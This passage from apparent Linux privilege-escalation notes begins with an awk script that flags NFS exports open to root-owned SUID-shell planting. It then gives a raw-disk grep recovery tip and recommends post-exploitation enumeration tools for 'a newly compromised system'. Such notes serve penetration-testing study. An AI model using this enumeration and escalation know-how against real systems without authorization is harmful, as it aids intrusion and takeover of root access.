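        /^[ \t]*#/ || /^[ \t]*$/ { next }
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                n = split($i, parts, "[(]")
                client = parts[1]
                opts = (n > 1) ? substr(parts[2], 1, length(parts[2]) - 1) : ""
                print path, client, opts
            }
        }'
}

# From the expanded entries, print the abusable ones with a short reason.
risky_exports() {
    expand_exports "$1" | awk '
        {
            opts = "," $3 ","
            rw   = index(opts, ",rw,") > 0
            nrs  = index(opts, ",no_root_squash,") > 0
            wild = ($2 == "*")
            if (rw && nrs)       print $1, $2, "rw+no_root_squash"
            else if (rw && wild) print $1, $2, "rw+world"
        }'
}

echo "All entries:"
expand_exports "$SAMPLE_EXPORTS"
echo "Abusable:"
risky_exports "$SAMPLE_EXPORTS"
```

On the sample, /srv/backup and the wildcard entry for /home come out as rw+no_root_squash (the SUID-shell attack applies), while /srv/tmp is rw+world (anyone can plant files, but root squashing applies). /srv/public and the squashed /home entry are not flagged.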
TIPS
Recovering Deleted Files
Command: sudo grep -i -a -B100 -A100 'string' /dev/sda1 > file.txt
Replace /dev/sda1 with the device the file was on and 'string' with a string unique to the file. This can take some time: it searches the raw device for the string and writes the 100 lines before and after each hit to file.txt. Adjust -B and -A if you need more context. Expect some surrounding garbage, but the text should be recoverable.
Automation Tools
LinEnum
http://www.rebootuser.com/?p=1758
This tool is great at running through a heap of things you should check on a Linux system in the post-exploitation process. This includes file permissions, cron jobs if visible, weak credentials, etc. It is the first thing I run on a newly compromised system.
LinuxPrivChecker
http://www.securitysift.com/download/linuxprivchecker.py
This is a great tool for once again checking a lot of standard things like file permissions etc. The real gem of this script is the recommended privilege escalation exploits given at the conclusion of the script. This is a great starting point for escalation.
Resources
https://www.rebootuser.com/?p=1623
https://github.com/Shiva108/CTF-notes/blob/master/Kali%20Linux%20Offensive%20Security%20Certified%20Professional%20Playbook.html
http://pwnwiki.io/#!index.md
https://github.com/Shiva108/CTF-notes/blob/master/dostoevsky-pentest-notes-master/chapter-5.md
https://guif.re/linuxeop